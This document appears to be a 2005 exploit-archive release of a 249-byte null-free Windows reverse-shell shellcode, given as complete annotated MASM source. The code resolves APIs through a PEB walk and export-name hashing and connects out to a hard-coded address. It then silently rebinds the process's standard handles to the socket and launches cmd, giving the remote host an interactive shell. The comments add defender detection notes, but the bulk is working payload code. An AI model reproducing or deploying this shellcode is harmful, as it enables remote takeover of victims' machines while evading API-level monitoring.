
nooil.txt

Posted Aug 17, 2005
Authored by Matthieu Suiche

New generation shellcode using 'nooil tricks' methodology. 249 bytes reverse generic shellcode without loader (no null byte).

tags | shellcode
SHA-256 | fd35c001c46f13468f2d40f4e5dee47a5e1803c677189bf3889635375ef9f4bd


We use the PEB to reach the standard Input/Output/Error handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB_LDR_DATA LoaderData ;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters ;
...
typedef struct RTL_USER_PROCESS_PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we now have:
; Excerpt (MASM syntax): reach the process's standard handles through
; TEB -> PEB -> ProcessParameters and overwrite them with the client
; socket. No SetStdHandle call is made, so only the three memory writes
; are observable; hClientSocket stands for the connected socket handle.
mov eax,dword ptr fs :[18h]                      ; fs:[18h] = TEB.NtTib.Self
mov eax,dword ptr ds :[eax+30h]                  ; TEB+30h = ProcessEnvironmentBlock
mov eax,dword ptr ds :[eax+10h]                  ; PEB+10h = ProcessParameters (see struct above)
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD_INPUT_HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD_OUTPUT_HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD_ERROR_HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader (no null byte):

comment *
-----------------------------------------------------------------
---- New generation shellcode using my "nooil tricks" methods ---
---- (c) 2005 - Matthieu Suiche / msuiche@gmail.com ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
; ---------------------------------------------------------------------
; Analysis notes (MASM, Intel syntax; 32-bit Windows; flat model).
; Execution order: (1) find kernel32 through the PEB loader list and
; resolve LoadLibraryA by an 8-byte name sum over the export table,
; (2) LoadLibraryA("ws2_32"), WSAStartup, WSASocket, connect() to the
; hard-coded sin_addr:sin_port, (3) overwrite the three standard handles
; inside RTL_USER_PROCESS_PARAMETERS with the socket, (4) msvcrt!system
; ("cmd") so the child inherits the socket as its stdio, (5) ExitProcess.
; Detection notes for defenders: step (3) writes PEB memory directly and
; never calls SetStdHandle, so API hooks only see LoadLibraryA / WSA* /
; connect / system; the durable artifacts are the outbound connect to
; the constant address, a cmd.exe child of the exploited process whose
; standard handles are a socket, and the fs:[30h] -> +0Ch -> +1Ch PEB
; walk plus the e_lfanew / +78h export-directory walk in the payload.
; ---------------------------------------------------------------------
.386
.model flat, stdcall

assume fs:nothing                                ; fs is used for raw TEB offsets below

; Name constants consumed by the resolver at Kernel32BaseAddr: each is the
; sum of the first two dwords (first 8 bytes) of the export name string,
; e.g. 'Load' + 'Libr' = 0D6C3D898h. Names shorter than 8 bytes pull in
; bytes past their terminator (the start of the next export name), so
; `system` (0E873E6D8h = 'syst' + "em\0t") is tied to one specific msvcrt
; export layout. These labels shadow the API names; they are not addresses.
LoadLibraryA equ 0D6C3D898h
WSAStartupA equ 0C7B3B4CBh
WSASocketA equ 0B8ACB6C6h
connect equ 06EE2D2C8h
system equ 0E873E6D8h
ExitProcessA equ 0D7D8EA95h
; ------------------------------
sin_addr equ 0B01A8C0h ; 192.168.1.11 (bytes C0 A8 01 0B in memory, i.e. network byte order)
sin_port equ 3713h ; 4919 (1337h in network byte order)
; ------------------------------
str_cmd equ 0FF646D63h                           ; "cmd" followed by 0FFh; patched to 00h at run time (see inc below)

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE -----
scode:
jmp short _eip                                   ; call/pop sequence to learn the payload's own address
GetEip:
pop edi                                          ; edi = address of Kernel32BaseAddr (the resolver), kept for the whole payload
jmp short EntryPoint
_eip:
call GetEip                                      ; pushes the address of the label that follows
; ---------------------------------------------------------------------
; Kernel32BaseAddr / MyGetProcAddr - export resolver, entered via `call edi`
;   In:    eax     = module base to search, or 0 to locate kernel32 via the PEB
;          [esp+4] = name constant (sum of the export name's first 8 bytes)
;   Out:   eax     = virtual address of the matching export
;   Clobb: flags only; every other register is restored by popad
;   Stack: retn does not pop the constant, so each call leaves 4 bytes behind
;   Note:  no end-of-table check; an unmatched constant keeps reading past
;          AddressOfNames until a sum happens to match, or faults
; ---------------------------------------------------------------------
Kernel32BaseAddr:
pushad                                           ; frame: [esp+28] = saved eax, [esp+32] = return address, [esp+36] = name constant
test eax, eax
jnz MyGetProcAddr                                ; caller supplied a module base
; eax = 0
mov eax, dword ptr fs:[eax+30h]                  ; fs:[30h] = TEB.ProcessEnvironmentBlock -> PEB
mov eax, dword ptr ds:[eax+0ch]                  ; PEB+0Ch = Ldr (PEB_LDR_DATA)
mov esi, dword ptr ds:[eax+1ch]                  ; Ldr+1Ch = InInitializationOrderModuleList.Flink
lodsd                                            ; eax = Flink of the first entry = second module in init order
mov eax, dword ptr ds:[eax+08h]                  ; +8 from the init-order link = DllBase
; NOTE(review): the second init-order module was kernel32 on the 2005-era
; Windows this targets; later versions put other DLLs ahead of it, so this
; path is version-dependent - confirm before relying on it in a signature
; or an emulator.
MyGetProcAddr:
mov edx, eax

; - PE
add edx, dword ptr ds:[edx+3ch]                  ; edx = base + e_lfanew = IMAGE_NT_HEADERS

; - Export Table
mov edx, dword ptr ds:[edx+78h]                  ; DataDirectory[EXPORT].VirtualAddress (RVA)
add edx, eax                                     ; edx = IMAGE_EXPORT_DIRECTORY

mov ebx, dword ptr ds:[edx+20h]                  ; AddressOfNames RVA
add ebx, eax                                     ; ebx = name pointer table

xor ecx, ecx                                     ; ecx = name index (pre-incremented, so index 0 is never compared)
mov ebp, eax                                     ; ebp = module base, kept across the loop

FindAddr:
inc ecx
mov edi, dword ptr ds:[ebx+ecx*4]
add edi, eax                                     ; edi = export name string

mov esi, dword ptr [edi]                         ; first 4 bytes of the name
add esi, dword ptr [edi+4]                       ; + next 4 bytes = the "hash"
cmp esi, [esp+36]                                ; compare with the constant the caller pushed
jz AddrFound
jmp short FindAddr

AddrFound:

mov ebx, dword ptr ds:[edx+24h]                  ; AddressOfNameOrdinals RVA
add ebx, ebp
mov cx,word ptr ds:[ebx+ecx*2]                   ; cx = ordinal (16-bit write; upper half of ecx keeps the index's upper half, effectively zero)

mov ebx, dword ptr ds:[edx+1Ch]                  ; AddressOfFunctions RVA
add ebx, ebp
add ebp, dword ptr ds:[ebx+ecx*4]                ; ebp = base + function RVA

mov dword ptr [esp+28], ebp                      ; overwrite the saved eax so popad returns the result
popad
retn                                             ; constant left on the stack (no `retn 4`)

; ---------------------------------------------------------------------
; EntryPoint - main sequence. Register roles kept across calls:
;   edi = resolver, ebp = LoadLibraryA, ebx = ws2_32 base then the socket.
;   eax doubles as "last return value" and "module base for the next
;   lookup", so every step assumes the previous call succeeded.
; ---------------------------------------------------------------------
EntryPoint:
xor eax, eax                                     ; 0 -> resolver locates kernel32 itself
xor ecx, ecx
push LoadLibraryA
call edi ; MyGetProcAddr(LoadLibraryA);
mov ebp, eax                                     ; ebp = LoadLibraryA for the rest of the payload

push cx                                          ; cx = 0: two zero bytes terminate the string without a 00h in the code
push word ptr '23'
push '_2sw'                                      ; stack now holds "ws2_32",0,0
push esp
call eax ; LoadLibraryA("ws2_32");

mov ebx, eax                                     ; ebx = ws2_32 base

push WSAStartupA
call edi ; MyGetProcAddr(WSAStartupA) - eax is still the ws2_32 base here


mov esi, esp
add si, -301h                                    ; esi = esp - 301h (16-bit add on si): scratch area for the WSADATA out-param
push esi
push 2                                           ; wVersionRequested = 2
call eax ; WSAStartup(2,&WSAstruct);

mov eax, ebx                                     ; back to the ws2_32 base for the next lookup

push WSASocketA
call edi ; MyGetProcAddr(WSASocketA);

xor esi, esi
push esi                                         ; dwFlags = 0
push esi                                         ; g = 0
push esi                                         ; lpProtocolInfo = NULL
push esi                                         ; protocol = 0
inc esi
push esi                                         ; type = 1 (SOCK_STREAM)
inc esi
push esi                                         ; af = 2 (AF_INET); esi stays 2 for the sockaddr below
call eax ; WSASocket(2,1,0,0,0,0);

xchg ebx, eax ; ebx = sockfd , eax = ws2_32

push sin_addr                                    ; sockaddr_in built on the stack, last field first:
push word ptr sin_port                           ;   sin_addr, then sin_port,
push si                                          ;   then sin_family = 2; the 8 sin_zero bytes are whatever already sits above
mov esi, esp                                     ; esi = &sockaddr_in

push connect
call edi ; MyGetProcAddr(connect)

push 10h                                         ; sizeof(sockaddr_in)
push esi
push ebx
call eax ; connect(sockfd, &struct, sizeof(struct));

push ax                                          ; assumes connect() returned 0: ax supplies the two terminating zero bytes
push word ptr 'tr'
push 'cvsm'                                      ; stack now holds "msvcrt",0,0
push esp
call ebp ; LoadLibraryA("msvcrt");

push system
call edi ; MyGetProcAddr(system); - eax = msvcrt base from the call above

; ----------------------------- nooil tricks ----------------------------------
; Redirect the process's standard handles to the socket by writing the
; RTL_USER_PROCESS_PARAMETERS fields directly (see the struct above) instead
; of calling SetStdHandle. Only ecx is used, so eax (the resolved `system`)
; survives and no API call is visible for this step.
xor ecx, ecx
mov ecx,dword ptr fs:[ecx+18h]                   ; fs:[18h] = TEB.NtTib.Self
mov ecx,dword ptr ds:[ecx+30h]                   ; TEB+30h = PEB
mov ecx,dword ptr ds:[ecx+10h]                   ; PEB+10h = ProcessParameters
mov dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
mov dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
mov dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
; -----------------------------------------------------------------------------


push str_cmd                                     ; "cmd",0FFh
inc byte ptr [esp+3]                             ; 0FFh -> 00h: terminator created at run time so the code stays null-free
push esp
call eax ; system("cmd"); - the child inherits the socket as stdin/stdout/stderr

; Exit
; NOTE(review): eax here is system()'s return value. The resolver only
; falls back to the PEB walk when eax == 0, so a non-zero exit status is
; treated as a module base and dereferenced; this tail only works when
; cmd exited with status 0.
push ExitProcessA
call edi ; MyGetProcAddr(ExitProcessA)
call eax ; ExitProcessA(); - the constant left on the stack by retn becomes uExitCode
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------